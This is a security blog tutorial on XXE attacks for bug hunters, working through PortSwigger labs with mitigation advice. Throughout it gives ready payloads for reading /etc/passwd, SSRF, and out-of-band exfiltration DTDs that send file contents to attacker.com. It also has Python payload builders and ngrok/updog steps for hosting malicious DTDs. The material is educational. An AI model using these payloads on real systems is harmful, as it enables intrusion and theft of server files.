XML External Entities (XXE): Unleashing the Power of XML

ayush khatkar

Jul 8, 2024 • 15 min read

XML External Entities (XXE) is a type of web vulnerability that allows attackers to exploit weaknesses in how an application parses XML input. Think of it as a secret passage hidden within the structure of an XML document, waiting to be discovered and exploited by a cunning adversary.

Understanding XXE: The Basics

XML, or Extensible Markup Language, is a widely used format for storing and transmitting data. XML documents can include declarations of external entities, which are references to external resources like files or URLs. XXE vulnerabilities arise when an XML parser, the software that processes XML documents, blindly processes these external entities without proper security checks.

The Anatomy of an XXE Attack

1. Malicious XML Input: The attacker crafts an XML document that includes a declaration of an external entity. This entity can reference a sensitive file on the server, a remote system, or even trigger actions like port scanning.
2. XML Parsing: The vulnerable application parses the XML input, including the external entity declaration.
3. Entity Resolution: The XML parser resolves the external entity by fetching the referenced resource.
4. Attacker's Gain: Depending on the nature of the external entity, the attacker can:
    ○ Read the contents of sensitive files on the server (e.g., /etc/passwd)
    ○ Make requests to internal systems or services (SSRF)
    ○ Perform port scanning or other network reconnaissance
    ○ Cause a denial of service (DoS) by triggering nested entity expansion
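To make that last point concrete, here is a minimal Python sketch of nested entity expansion, kept deliberately tiny so it is safe to run. The entity names a, b, and c are made up for illustration; a real denial-of-service payload would chain many more levels.

```python
import xml.etree.ElementTree as ET

# Three levels of internal entities, each referencing the previous one four times.
# Deliberately small: a real attack would nest far deeper.
DOC = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY a "ha">
  <!ENTITY b "&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;">
]>
<lolz>&c;</lolz>"""

root = ET.fromstring(DOC)
expanded = root.text  # the parser has already expanded &c; into plain text

print(len(expanded), "characters came out of a single &c; reference")
```

Each extra level multiplies the output by four here, which is why a short document can exhaust memory on a parser that expands entities without limits.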

Types of XXE Attacks

1. In-band XXE: The attacker receives the results of their attack directly through the application's response.
2. Out-of-band XXE: The attacker receives the results of their attack through a different channel, such as an external server they control.
3. Blind XXE: The attacker cannot see the results of their attack directly, but can infer them based on the application's behavior.

Impact of XXE Attacks

XXE attacks can have severe consequences, including:

○ Data Breach: Attackers can access sensitive data, such as passwords, credit card numbers, or confidential business information.
○ Server-Side Request Forgery (SSRF): Attackers can force the server to make requests to internal systems or services, potentially bypassing firewalls and access controls.
○ Denial of Service (DoS): Attackers can cause a DoS attack by triggering nested entity expansion, consuming excessive server resources.
○ Remote Code Execution (RCE): In some cases, XXE can be used to execute arbitrary code on the server, allowing the attacker to take complete control.

Identifying and Exploiting XXE Vulnerabilities

Manual Testing:
    ○ Identify input points that accept XML data.
    ○ Inject XML payloads containing external entity declarations.
    ○ Observe the application's response for signs of successful exploitation, such as error messages or unexpected data.
Automated Scanning:
    ○ Use web vulnerability scanners like Burp Suite or OWASP ZAP to automate the process of finding XXE vulnerabilities.

Example Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
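If you prefer scripting to a proxy, the payload above can be wrapped in a request with a few lines of Python. This is only a sketch: the function name build_xxe_request and the endpoint https://target.example/api/import are hypothetical, and nothing is sent until you call urlopen yourself against a target you are authorized to test.

```python
import urllib.request


def build_xxe_request(url: str, target_file: str = "/etc/passwd") -> urllib.request.Request:
    """Wrap the classic file-read payload in a POST request (nothing is sent here)."""
    payload = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "file://{target_file}">\n'
        "]>\n"
        "<foo>&xxe;</foo>"
    )
    return urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


# Hypothetical endpoint: replace it with one you are allowed to test.
req = build_xxe_request("https://target.example/api/import")
print(req.get_method(), req.full_url)
print(req.data.decode("utf-8"))
# To actually send it: urllib.request.urlopen(req).read()
```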

Mitigating XXE Attacks

○ Disable External Entity Processing: Configure your XML parser to disable the processing of external entities.
○ Input Validation: Validate and sanitize all XML input to prevent malicious entity declarations.
○ Use Less Complex Data Formats: If possible, consider using less complex data formats like JSON, which are not vulnerable to XXE.
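As one example of the first mitigation, here is a minimal sketch using Python's standard xml.sax module, with external general and parameter entities explicitly switched off. The helper names TextCollector and parse_without_external_entities are my own; other languages and parsers have their own equivalent switches, so treat this as an illustration rather than a universal recipe.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Collect all character data so we can inspect what the parser produced."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(xml_bytes: bytes) -> str:
    parser = xml.sax.make_parser()
    # Explicitly refuse to resolve external general and parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

result = parse_without_external_entities(PAYLOAD)
print(repr(result))  # the file contents should not show up here
```

Recent Python versions already ship with external general entities disabled in xml.sax, but setting the feature explicitly documents the intent and protects you if a default ever differs.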

Testing Methodology:

1. Identify Potential Entry Points:
○ Look for functionalities that process XML data, especially those that accept XML input from users or external sources. Common examples include:
● XML uploads: File upload forms that accept XML files.
● XML APIs: REST or SOAP APIs that take XML data as input.
● XML-based configuration files: Applications that load configuration settings from XML files.
● SOAP web services: Services that use SOAP (Simple Object Access Protocol), which is based on XML.

2. Craft XXE Payloads:

● Basic XXE:

○ Inject a basic external entity declaration into the XML input:

            <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
            <test>&xxe;</test>

If vulnerable, the application might return the contents of the "/etc/passwd" file.

● Parameter Entity:

○ Inject a parameter entity to expand within the DTD (Document Type Definition):

    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
    <test></test>

● Blind XXE (Out-of-Band):

○ If the application doesn't directly return the entity's content, use an external DTD and send the results to a system you control:

    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://your-server.com/evil.dtd"> %xxe; ]>
    <test></test>

3. Bypass Techniques:
● URL Encoding: Encode special characters like spaces and newlines to bypass filters.
● Variations in Entity Declarations: Experiment with different syntaxes and entity types (parameter entities, general entities) to evade detection.

Real-World Examples:

● Content Management Systems (CMS): Many CMS platforms use XML for configuration or data storage, making them potential targets for XXE attacks.
● Web Services: SOAP-based web services that accept XML input may be vulnerable to XXE injection.
● Document Processing: Applications that process XML documents, like online editors or file converters, might be susceptible to XXE attacks if they don't properly validate input.

Tools:

● Burp Suite: Use Burp Suite's proxy and repeater features to intercept and modify XML requests.
● XXEinjector: An automated XXE vulnerability scanner.
● XXExploiter: A tool for generating and delivering XXE payloads.
● Fuzzers: General-purpose fuzzers can be used to test XML input for unexpected behavior or errors.

XXE in Bug Hunting

XXE stands for XML External Entity. First, it's important to realize that XXE can only occur in applications that handle XML data on the client or server side. Also keep in mind that file formats such as docx, xlsx, and pptx are XML-based. XXE takes advantage of the way an application handles input that contains external entities. An XXE can be used to call out to a malicious server or to retrieve data from a server. File uploads can also be abused for XXE. If everything seems overwhelming, just relax and keep reading.

How does the XXE vulnerability happen?

XXE can arise when an application uses XML to transfer or store data between a browser and a server, because the XML specification includes a number of potentially dangerous features that standard parsers support.

Let's first study XML, entities, and DTDs before moving on to XXE.

XML stands for Extensible Markup Language.

Although XML and HTML look similar, XML has no predefined tags; you define your own custom tags. It's also worth remembering that browsers are forgiving about HTML: for example, a heading opened with <h1> will usually still render even if the closing </h1> tag is missing. In XML, however, every tag must be closed.

XML-Based Entities:

In order to represent data in XML, we use XML entities. As seen in the illustration, add1 and add2 are XML entities that contain address data. If you have any programming experience, you can think of an entity as a variable that holds data, which we reference using the notation "&ENTITY_NAME;" whenever we need that data in the output. As you can see, we referenced add1 on line 11 by using &add1;, so James' address, name, and phone number will now appear in the response.
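A document along these lines can be tried out with a short Python sketch. This is not the original illustration: the address and phone values are invented, and the standard library's ElementTree is used only to show that the parser substitutes the entity's value wherever it is referenced.

```python
import xml.etree.ElementTree as ET

# add1 and add2 are internal entities: their values live in the document itself.
DOC = """<?xml version="1.0"?>
<!DOCTYPE customers [
  <!ENTITY add1 "12 Example Street, Springfield">
  <!ENTITY add2 "34 Sample Avenue, Shelbyville">
]>
<customers>
  <customer>
    <name>James</name>
    <phone>555-0100</phone>
    <address>&add1;</address>
  </customer>
</customers>"""

root = ET.fromstring(DOC)
customer = root.find("customer")

# The parser has already replaced &add1; with the entity's value.
print(customer.findtext("name"), "|", customer.findtext("address"))
```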

Document Type Definition, or DTD:

Declarations found in DTDs can specify an XML document's structure, allowable data types and values, and other things.

The DTD can be entirely contained within the document (an "internal DTD"), loaded from another location (an "external DTD"), or a combination of the two.

In the example above, a DTD is specified for an application's customer structure. Since the values for add1 and add2 are defined in the document itself rather than loaded from an external source (URL/URI), it is an example of an internal DTD.

An entity is considered external if it loads its data from somewhere outside the DTD. In this scenario, the SYSTEM keyword tells the parser to load data from the specified URI.

For example, loading data from an external URL:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://vulnerable.com/some-data" > ]>

Or reading a file directly from the server:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///path/to/file" > ]>

The data at these URIs will now be loaded into the application's response whenever &xxe; is referenced.

We will now attempt to load data from an external source by abusing these entity features, hence the name XXE (XML External Entity).

PortSwigger offers excellent labs for testing what you've learned. I'll proceed from the basic labs to advanced XXE injection.

PS: You will need to solve the labs on your own; I will not be writing the solutions for you. There is also no point in giving out the solutions since they are already available in plenty of blogs and videos. Study, learn, and put it into practice yourself.

Now, here are a few things you can accomplish if a web application is vulnerable to XXE:

○ Exfiltrate data from the server, such as the contents of /etc/passwd.
○ Achieve SSRF via XXE by telling the server to load data from internal URLs. Because the request originates from the server itself, you will be able to reach internal URLs.
○ Exfiltrate data by making a request to your own server (an out-of-band request). If the application doesn't allow regular entities (e.g. &xxe;) or doesn't display any output from your XXE payload, it is a blind XXE, and you can confirm it by making an out-of-band request.
○ Force the application to throw an error and return your XXE output along with the system error.

Exploiting XXE to extract files

LAB 1: Using XXE to Extract Files: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

You can see that this application receives and processes XML data. So let's check whether it is vulnerable.

(I'm going to assume you are familiar with intercepting traffic and testing request flow. If not, start by learning that.)

Let's introduce our DTD into the XML data.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Here, a DTD is defined to load data from an external source into our variable/entity xxe. The SYSTEM keyword is followed by a URI, which can use schemes such as http:// and file://.

This DTD instructs the XML parser to load data from /etc/passwd and display it whenever &xxe; is referenced.

You can request any file on the server that the web server's user can read, such as /etc/hostname. If the server runs Linux, you can provide any Linux path after file://.

This is how an XXE looks in a web server.

Using XXE to perform SSRF attacks

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable.com/"> ]>

PS: There is no syntactical restriction on the name you can use in place of foo.

The xxe entity in this DTD attempts to load data from an internal URL, which may be anything. If the server runs on a cloud service, you can even load its cloud metadata in this manner. If you don't already know the fundamentals of SSRF, I would advise learning from this fantastic repository.

Blind XXE vulnerabilities

This means that although the application is vulnerable, it does not return the values of any defined external entities in its responses, so it is not feasible to retrieve server-side files directly. Simply put, you cannot read the contents of /etc/passwd directly. Instead, you will need to load the contents of /etc/passwd and send them to your server as a parameter in an out-of-band request. PortSwigger provides an exploit server in these labs.

I believe that PortSwigger overcomplicated things a little bit. If you read their solutions, they frequently use both Burp Collaborator and the exploit server, among other tricky techniques. You are more than welcome to use that approach if that is how you work. What I'm here to discuss is how to exploit XXE.

I just used the exploit server to deliver the payload and collect the output in my exploit server log because I like to keep things simple.

Before sending your payload to the server, make sure the application is capable of making an out-of-band request. You only need to provide a harmless URL on your server in an XML entity, and then watch whether the victim server sends you any GET requests.

Now for the useful part: simply send this DTD in the XML body.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://test.attacker.com"> ]>

I assume that you have a good idea of what's going on by now. A DTD with an entity xxe is defined, and it sends a request to your exploit server or Burp Collaborator server. Simply reference this xxe entity and watch Collaborator for DNS and HTTP requests. With the exploit server, you can only see HTTP requests, not DNS lookups.

Note: DNS lookups are only visible if you run your own DNS server on your IP address. PortSwigger's labs block communication with external servers for security reasons, so you can only use their server.
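Outside the labs, the "watch for a GET request" step can be done with a tiny listener of your own. Below is a minimal sketch using only Python's standard library; the names LoggingHandler and start_listener and the port 8000 are my own choices, and it records HTTP callbacks only, not DNS lookups.

```python
import http.server
import threading


class LoggingHandler(http.server.BaseHTTPRequestHandler):
    hits = []  # (client_ip, path) tuples, shared by all requests

    def do_GET(self):
        # Record who called back and which path (including any query string).
        LoggingHandler.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        print("callback from", self.client_address[0], "-", fmt % args)


def start_listener(port: int = 8000) -> http.server.HTTPServer:
    """Start the listener in a background thread and return the server object."""
    server = http.server.HTTPServer(("0.0.0.0", port), LoggingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Call start_listener(8000), keep the process alive, point your entity's URL at the machine, and inspect LoggingHandler.hits (or the printed lines) for requests coming from the victim server.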

Parameter entities:

Regular entity usage may be blocked by the XML parser or the application itself, so you can't simply define an entity called xxe and reference it with &xxe;.

In this situation you must use parameter entities, which can only be referenced within the DTD.

In the declaration of an XML parameter entity, a percent character appears before the entity name:

<!ENTITY % xxe "parameter value" >

and you will use %xxe; to reference this entity.

Using a parameter entity, the DTD to check for out-of-band requests looks like this:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://test.attacker.com"> %xxe; ]>

Note: In this case, the entity is referenced only inside the DTD.

You'll observe communication between the victim server and your server.

Exploiting blind XXE to exfiltrate data out-of-band

Because the application does not return any output for xxe, the sensitive data is loaded into an entity and sent to your server as a URL parameter.

So, after identifying the blind XXE, we will exfiltrate some data from the victim server. This is a multi-step process, and there are two possible approaches. First, let's look at the PortSwigger one.

1. We make the victim server send a request to an endpoint on our exploit server that hosts a DTD file.
2. This DTD file contains malicious XML that loads sensitive data when parsed and then uses that data in a request to your server.

Simply insert this DTD into the XML data.

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe;]>

Put your exploit server's /exploit URL in place of the URL.

Referencing your entity with %xxe; will send a request to your exploit server, which is hosting a DTD file with the following content.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?p=%file;'>">
%eval;
%exfiltrate;

Put your exploit server URL in place of the URL.

First, a parameter entity named file loads the contents of /etc/passwd.
After that, we declare a second entity called eval, whose value is itself an entity declaration, which is why the % is encoded as the character reference &#x25;. Handle quotes and brackets with care.
Next, %eval; is referenced, which dynamically creates the URL with the file data passed as a parameter.
Finally, %exfiltrate; sends the request to the created URL.

The contents of /etc/passwd will then show up in your server log.
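Since the quoting in that DTD is easy to get wrong by hand, a small generator can help. This is a sketch under my own naming (build_exfil_dtd is not from any tool); it simply reproduces the four lines shown above for whatever callback URL and file you pass in.

```python
def build_exfil_dtd(callback_url: str, target_file: str = "/etc/passwd") -> str:
    """Return the text of an external DTD that sends target_file to callback_url."""
    return (
        # 1. Load the file into the parameter entity %file;
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # 2. %eval; declares %exfiltrate; note the inner % written as &#x25;
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '
        f"'{callback_url}/?p=%file;'>\">\n"
        # 3. Expand %eval; so that %exfiltrate; exists, then trigger the request.
        "%eval;\n"
        "%exfiltrate;\n"
    )


dtd_text = build_exfil_dtd("http://attacker.com")
print(dtd_text)
```

Save the output as the DTD file on your server and keep the same host in the %xxe; entity of the XML you send.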

Another approach would be:

<!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]>

Two entities have been defined here. One specifies which file to load, and the other sends a request to the attacker server, which is hosting a malicious DTD file.

evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?collect=%file;'>">

%all;

The two differences are as follows. First, the dynamically created send entity is not a parameter entity, so it must be referenced in the XML request with &send; in order to send the data to the attacker server. Second, we do not specify which file to load in the DTD file because we already did so in the XML request.

Exfiltration through an error message

If the application displays all parsing errors in its response, we can force an XML parsing error and the application will display the error along with our XXE output.

e.g.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///null/%file;'>">
%eval;
%error;

Here, we first reference an external DTD on a malicious server (we won't write that part again).

Then the malicious DTD loads the contents of /etc/passwd.
It dynamically creates the path /null/%file;, with the contents of /etc/passwd substituted into it.
Requesting that path results in an error because /null/ does not exist.

So the error "not found /null/<output of /etc/passwd>" appears in the final output.

Exploiting blind XXE by repurposing a local DTD

Consider a scenario where regular XXE is not achievable and only blind XXE is feasible, but a firewall blocks out-of-band requests as well.

What is the solution in this case? Some applications block outgoing HTTP requests to prevent out-of-band connections. In that case, you look for DNS lookups pointing to your server. We need a VPS in order to watch for DNS lookups. If you can get a decent VPS, you can Google how to set it up for XXE exploitation and check its logs.

What if you can't run a DNS server, or DNS lookups are blocked too? With blind XXE and no out-of-band requests, we can reuse a local DTD that already exists on the server.

This means we need to locate a DTD file that is already present on the server. (Most Linux and Windows systems ship with DTD files, and much of the software that includes them is open source, so you can inspect them.)

We select an entity from the DTD we located, redefine it, and intentionally introduce an error so that our XXE data is returned in the response along with the error message.

An XML entity cannot be changed once it is defined: if two entities with the same name are declared, the parser uses the first declaration. As a result, in our case, the entity definition we provide takes precedence over the one found in the server's DTD.

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///null/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

Although it appears complicated, I'll explain it.

The local_dtd entity loads an existing DTD file from the server.
We pick an entity that this DTD defines, here called custom_entity, and redefine it.
Inside custom_entity we then dynamically create a new entity to load the contents of /etc/passwd.
To trigger an error, the eval entity constructs another entity inside it called error.

Since everything is contained within the custom_entity definition, it is all encoded as XML character references. As you can see, the entities within custom_entity resemble the ones we wrote for the error-based XXE in the previous section. The only differences are that everything is encoded and defined inside custom_entity.
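The encoding step is mechanical, so here is a short Python sketch of it. The function names are my own, and the path and entity name are just the ones from the example above; on a real target you would substitute a DTD path and entity name that actually exist on that server.

```python
def encode_for_entity_value(dtd: str) -> str:
    """Encode DTD text so it can sit inside a single-quoted entity value."""
    return (
        dtd.replace("&", "&#x26;")   # must come first so later output is not re-encoded
           .replace("%", "&#x25;")
           .replace("'", "&#x27;")
    )


# The error-based DTD from the previous section, unencoded.
ERROR_DTD = (
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    "<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///null/%file;'>\">\n"
    "%eval;\n"
    "%error;\n"
)


def build_local_dtd_payload(local_dtd_path: str, entity_name: str) -> str:
    """Redefine entity_name before loading the server's own DTD."""
    inner = encode_for_entity_value(ERROR_DTD)
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{local_dtd_path}">\n'
        f"<!ENTITY % {entity_name} '\n{inner}'>\n"
        "%local_dtd;\n"
        "]>"
    )


payload = build_local_dtd_payload("/usr/local/app/schema.dtd", "custom_entity")
print(payload)
```

Note how the already-encoded &#x25; in the eval line becomes &#x26;#x25; after this pass, which is exactly the double encoding you see in the payload above.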

Here are some other interesting places to look for XXE:

XInclude attacks:

The idea behind this attack is straightforward: what if an application doesn't use XML to transfer data from client to server? In that case, neither writing a DTD nor using blind XXE is feasible, because you simply don't control the XML document.

But how does the server handle user-supplied data in the back end? It may embed it in a SOAP request, for example. SOAP requests are XML too, and the XML is parsed on the back end.

XInclude, which is used to build large XML documents from smaller, independent XML documents, can be used in this situation.

So we can supply input that will be parsed as XML on the back end.

Naturally, in real life you can't tell which parameter ends up in the XML, so you have to test each parameter and see which one affects the response.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
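Trying the payload in every parameter gets tedious, so here is a minimal sketch that generates one URL-encoded form body per parameter. The parameter names productId and storeId are hypothetical, and the helper names are my own; sending the bodies is left to your proxy or HTTP client.

```python
import urllib.parse
import xml.etree.ElementTree as ET

XINCLUDE_PAYLOAD = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)


def build_form_body(params: dict, injected_param: str) -> str:
    """Return a form body where one parameter's value is the XInclude payload."""
    body = dict(params)
    body[injected_param] = XINCLUDE_PAYLOAD
    return urllib.parse.urlencode(body)


def bodies_for_each_param(params: dict):
    """Yield (parameter name, form body) pairs, injecting into one parameter at a time."""
    for name in params:
        yield name, build_form_body(params, name)


# Sanity check that the payload itself is well-formed XML before sending it anywhere.
ET.fromstring(XINCLUDE_PAYLOAD)

# productId and storeId are hypothetical parameter names.
for name, body in bodies_for_each_param({"productId": "1", "storeId": "1"}):
    print(name, "->", body)
```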

XXE attacks via file upload:

Watch which file types the application accepts and whether they can be abused for XXE, such as DOCX, XLSX, PPTX, and XML files.

Applications that accept JPG and PNG files may also accept SVG files.

Look for XXE using an SVG file. Do the PortSwigger lab.
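For the SVG case, a test file can be generated with a few lines of Python. This is only a sketch: the function name write_svg_payload, the dimensions, and the default target /etc/hostname are my own choices, and whether the contents come back depends on how the server renders the image.

```python
from pathlib import Path

# An SVG is just XML, so it can carry a DOCTYPE with an external entity.
SVG_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://{target}"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="60" version="1.1">
  <text x="0" y="20" font-size="16">&xxe;</text>
</svg>
"""


def write_svg_payload(path, target: str = "/etc/hostname") -> Path:
    """Write an SVG whose text element references an external entity."""
    out = Path(path)
    out.write_text(SVG_TEMPLATE.format(target=target), encoding="utf-8")
    return out


print(SVG_TEMPLATE.format(target="/etc/hostname"))
# Example: write_svg_payload("xxe.svg") and upload the file as an avatar or image.
```

If the application renders the uploaded image on the server, the file contents may appear as text inside the resulting picture.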

XXE via content type:

More precisely, this means testing whether the application accepts an XML content type and an XML document even where it normally expects another format; if it does, proceed with XXE testing on that endpoint.
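One way to run that test is to re-send a normal form submission as XML. The sketch below converts a URL-encoded body into an equivalent XML document; the function name form_to_xml and the root element name are assumptions, since the element names a given back end expects (if it accepts XML at all) have to be discovered by trial.

```python
import urllib.parse
from xml.sax.saxutils import escape


def form_to_xml(form_body: str, root: str = "root") -> str:
    """Turn 'a=1&b=2' into an XML document with one element per parameter.

    Assumes every parameter name is also a valid XML element name.
    """
    pairs = urllib.parse.parse_qsl(form_body, keep_blank_values=True)
    fields = "".join(f"<{name}>{escape(value)}</{name}>" for name, value in pairs)
    return f'<?xml version="1.0" encoding="UTF-8"?><{root}>{fields}</{root}>'


xml_body = form_to_xml("foo=bar&id=42")
print(xml_body)
# Re-send the request with this body and the header Content-Type: text/xml
```

If the response looks the same as with the original form body, the endpoint is parsing XML, and the payloads from the earlier sections are worth trying against it.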

Now, if you're like me and want to test real applications for out-of-band requests and deliver a malicious DTD from your own server, but you don't have a VPS, I may have something special for you:

Set up ngrok on your computer.

A publicly reachable address is required to receive the out-of-band request; ngrok will provide one.

Use updog to host the DTD file locally.

Something like Python's built-in HTTP server (python3 -m http.server 80) is comparable, but forget about setting all that up.

Simply install Updog using

pip3 install updog

Simply write a malicious DTD to suit your needs, then host it using Updog.

updog

Updog's default port is 9090, but you can change it to any port.

Since we are hosting our DTD file locally, we must now make it publicly available.

ngrok http 9090

It will generate a unique URL for you that is publicly accessible over the internet and forwards to your local server on port 9090.

Simply build a malicious DTD using your ngrok URL and use updog to host it again on port 9090. Should you encounter an "address already in use" error, simply force-terminate that process and launch updog again on port 9090 or any other port of your choosing.

If HTTP requests are blocked, the problem of detecting XXE through DNS lookups remains unsolved. In that case, a VPS is required and there is nothing we can do about it.

Anyway, you are now prepared to test XXE with external entities, blind XXE with out-of-band requests, error-based XXE, XInclude XXE, and file upload XXE.

I hope this teaches you something! Since you can't learn something in a day, use this as a guide and give yourself at least a week to get it. Read this repeatedly, complete all of the XXE labs, and look up any confusing concepts on Google.

Happy hunting!

Author: Ayush khatkar is a cybersecurity researcher, technical writer and an enthusiastic pen-tester at Asecurity. Contact here.

#bugbounty #infosec #cybersecurity